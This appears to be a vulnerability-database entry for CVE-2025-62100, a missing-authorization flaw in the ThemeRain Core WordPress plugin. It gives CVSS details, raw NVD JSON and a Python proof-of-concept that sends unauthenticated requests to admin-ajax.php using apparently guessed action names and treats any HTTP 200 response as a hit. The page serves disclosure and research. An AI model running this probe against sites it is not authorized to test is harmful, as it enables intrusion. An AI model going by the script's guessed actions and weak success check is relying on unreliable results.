Security Vulnerability Report
中文
CVE-2025-62100 CVSS 5.3 MEDIUM

CVE-2025-62100

Published: 2025-12-09 16:18:01
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in themerain ThemeRain Core themerain-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ThemeRain Core: from n/a through <= 1.1.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ThemeRain Core (themerain-core) WordPress插件 <= 1.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62100 PoC - ThemeRain Core Broken Access Control # Target: WordPress site with ThemeRain Core plugin <= 1.1.9 # Type: Missing Authorization / Broken Access Control import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62100 Missing Authorization in ThemeRain Core plugin """ # Common WordPress admin-ajax.php endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Try to access plugin functions without authentication # Based on Patchstack disclosure headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', } # Common vulnerable actions in themerain-core plugin vulnerable_actions = [ 'themerain_get_settings', 'themerain_save_settings', 'themerain_core_ajax', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-62100 - Missing Authorization in ThemeRain Core") for action in vulnerable_actions: try: data = {'action': action} response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10) # Check if request succeeds without authentication if response.status_code == 200: print(f"[+] Potential vulnerability found with action: {action}") print(f"[+] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error testing {action}: {e}") print("[*] No obvious vulnerability detected") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_62100_poc.py <target_url>") print("Example: python cve_2025_62100_poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62100", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:00.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themerain ThemeRain Core themerain-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ThemeRain Core: from n/a through <= 1.1.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/themerain-core/vulnerability/wordpress-themerain-core-plugin-1-1-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}